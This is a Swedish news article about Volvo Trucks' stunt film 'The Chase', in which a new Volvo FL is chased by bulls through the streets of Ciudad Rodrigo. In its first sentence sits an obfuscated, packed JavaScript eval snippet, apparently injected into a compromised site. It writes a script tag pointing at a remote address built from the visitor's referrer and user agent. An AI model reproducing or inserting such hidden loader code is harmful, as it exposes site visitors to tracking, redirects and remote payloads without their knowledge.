Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Se nya Volvo FL jagas av tjurar

Se nya Volvo FL jagas av tjurar


Scenen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehbbh|var|u0026u|referrer|iiiyt||js|php’.split(’|’),0,{}))
är som upplagd för drama. Rytmisk musik spelas när en rödmålad lastbil blir jagad av tjurar på kullerstensbalagda gator i Spanien. Så här börjar den senaste filmen i Volvo Lastvagnars spektakulära  och uppmärksammade  testserie där vi tidigare har sett  ”TheBallerina Stunt”,  ”The Hook” och ”The Hamster Stunt”. Senaste livetestet ”The Chase” har premiär på YouTube idag.

– Att ha tjurar som jagar lastbilen genom slingrande gränder innebär att nya Volvo FL verkligen var tvungen att bevisa sig själv. Och det gjorde den, säger Lars Terling, Vice President Marketing Communications för Volvo Lastvagnar.

I den nya filmen ”The Chase” spelas huvudrollen av stuntföraren Rob Hunt som är känd för sin roll i stora Hollywoodproduktioner. Hans uppdrag är att köra en Volvo FL lastbil i ett lopp in den medeltida spanska staden – jagad av en hord tjurar. I filmen ser man också traditionella spanska bull runners som försöker fånga den röda lastbilen för att kunna hoppa in i säkerhet från tjurhorden.

Det här stuntet är på riktigt.

–Staden är gammal, gatorna är väldigt smala och vi kör på hal kullersten. Att dessutom bli jagad av tjurar under tiden var en riktig utmaning, säger Rob Hunt.
Under testet fick Rob Hunt hålla en hastighet på minst 30 kilometer i timmen för att hinna undan tjurarna.

– Tjurarna höll hög fart och kom nära ibland, men lastbilen hanterade kurvorna väldigt bra så
det var bara att köra, säger Rob Hunt

#TheChase är inspelad på stängda gator i Ciudad Rodrigo, staden i nordvästra Spanien där tjurrusningen har sin härkomst, i samarbete med borgmästaren och stadens invånare. Filmen är regisserad av Oscarnominerade Henry Alex Rubin, som tillsammans med ett crew på 250 personer och 28 kameror inklusive en oktokopter och en 360° kamera filmade stuntet